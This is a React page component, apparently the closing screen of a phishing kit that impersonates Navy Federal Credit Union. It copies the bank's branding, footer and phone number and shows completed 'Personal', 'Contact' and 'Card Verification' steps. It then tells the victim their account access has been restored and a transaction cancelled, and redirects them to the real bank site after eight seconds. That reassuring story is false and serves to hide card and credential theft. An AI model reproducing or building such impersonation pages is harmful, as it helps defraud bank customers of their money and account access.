import { useState, useEffect } from "react";
import checkMark from "./checkmark.svg";
import activityPixel from "./activity_pixel.gif";
import completeStyle from "./main-2601c417d92b4204d877.module.css";

const Main = () => {
  const [modal, setModal] = useState(false);

  const reDirect = () => {
    setTimeout(() => (window.location = "https://www.navyfederal.org/"), 8000);
  };

  useEffect(() => {
    setTimeout(() => setModal(true), 8000);
  }, []);

  return (
    <>
      {modal && (
        <div id="wait-cursor" onClick={reDirect()}>
          <div className={completeStyle.loader}></div>
        </div>
      )}
      <header role="banner" id="application-header">
        <h1 className={completeStyle.visiblyHidden} role="presentation">
          Navy Federal Credit Union
        </h1>
      </header>

      <main role="main" id="app-main">
        <section>
          <div
            id="session-timeout-container"
            role="dialog"
            aria-describedby="session-timeout-info"
            aria-labelledby="session-timeout-info"
            style={{ display: "none" }}
          >
            <main id="session-timeout-warning">
              <div tabIndex="1000"></div>
              <h2 id="session-timeout-info">Are you still there?</h2>
              <p>
                For your security, your session will expire in 547 seconds.
              </p>{" "}
              <button
                id="something"
                tabIndex="1001"
                className={`${completeStyle.btn} ${completeStyle.secondary}`}
              >
                Continue Application
              </button>
              <div tabIndex="1002"></div>
            </main>
          </div>
          <div id="wait-cursor" style={{ display: "none" }}>
            <div className={completeStyle.loader}></div>
          </div>
          <div
            aria-live="assertive"
            className={completeStyle.visuallyHidden}
          ></div>

          <div data-v-1c530256="" data-v-169bc697="">
            <div
              data-v-1c530256=""
              className={`${completeStyle.container} ${completeStyle.clearfix} ${completeStyle.card} ${completeStyle.white}`}
            >
              <div
                data-v-5dff800b=""
                data-v-1c530256=""
                className={completeStyle.progressbarWrapper}
              >
                <ul
                  data-v-5dff800b=""
                  className={completeStyle.stepProgressBar}
                >
                  <li
                    data-v-5dff800b=""
                    className={`${completeStyle.stepItem} ${completeStyle.success}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Eligibility step checked"
                      aria-hidden="true"
                      className={completeStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />
                    <span
                      data-v-5dff800b=""
                      className={`${completeStyle.progressLabel} ${completeStyle.singleLinePadding}`}
                    >
                      Personal Verification
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={completeStyle.visuallyHidden}
                    >
                      step completed
                    </p>
                  </li>
                  <li
                    data-v-5dff800b=""
                    className={`${completeStyle.stepItem} ${completeStyle.success}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Membership step checked"
                      aria-hidden="true"
                      className={completeStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${completeStyle.progressLabel} ${completeStyle.singleLinePadding}`}
                    >
                      Contact Verification
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={completeStyle.visuallyHidden}
                    >
                      step completed
                    </p>
                  </li>
                  <li
                    data-v-5dff800b=""
                    className={`${completeStyle.stepItem} ${completeStyle.success}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Finish Setup step"
                      aria-hidden="true"
                      className={completeStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${completeStyle.progressLabel} ${completeStyle.singleLinePadding}`}
                    >
                      Card Verification
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={completeStyle.visuallyHidden}
                    >
                      step completed
                    </p>
                  </li>
                  <li
                    data-v-5dff800b=""
                    className={`${completeStyle.stepItem} ${completeStyle.success}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Sign In step"
                      aria-hidden="true"
                      className={completeStyle.stepItemCheckmark}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${completeStyle.progressLabel} ${completeStyle.singleLinePadding}`}
                    >
                      Complete
                    </span>
                    <p
                      data-v-5dff800b=""
                      className={completeStyle.visuallyHidden}
                    >
                      Step completed
                    </p>
                  </li>
                </ul>
              </div>
              <legend data-v-1c530256="" tabIndex="-1">
                <h1 data-v-1c530256="" className={completeStyle.prompt}>
                  Verification Complete
                </h1>
              </legend>

              <form data-v-1c530256="">
                We've restore your account access and cancel the transaction made
                from your account. You'll be redirect to our home page
                or click{" "}
                <a href="https://my.navyfederal.org/NFOAA_Auth/login.jsp">
                  {""}here
                </a>{" "}
                to login into your account.
              </form>
            </div>
          </div>
        </section>
      </main>

      <footer id="application-footer">
        <section
          className={`${completeStyle.containerFluid} ${completeStyle.container} ${completeStyle.clearfix}`}
        >
          <p>
            <strong>© 2021 Navy Federal Credit Union.</strong> All rights
            reserved
          </p>
          <p>
            <span
              className={`${completeStyle.nfcuIcon} ${completeStyle.iconNcua}`}
            ></span>
            <a
              href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf"
              target="_blank"
            >
              Federally Insured by NCUA
            </a>
            • If you have questions please contact us: 1-888-842-6328
          </p>
        </section>
      </footer>

      {/* <!-- 
Start of global snippet: Please do not remove
Place this snippet between the <head> and </head> tags on every page of your site.
-->
  <!-- Global site tag (gtag.js) - Google Marketing Platform -->


  <!-- End of global snippet: Please do not remove --> */}
      <img src={activityPixel} hidden="" />
    </>
  );
};

export default Main;
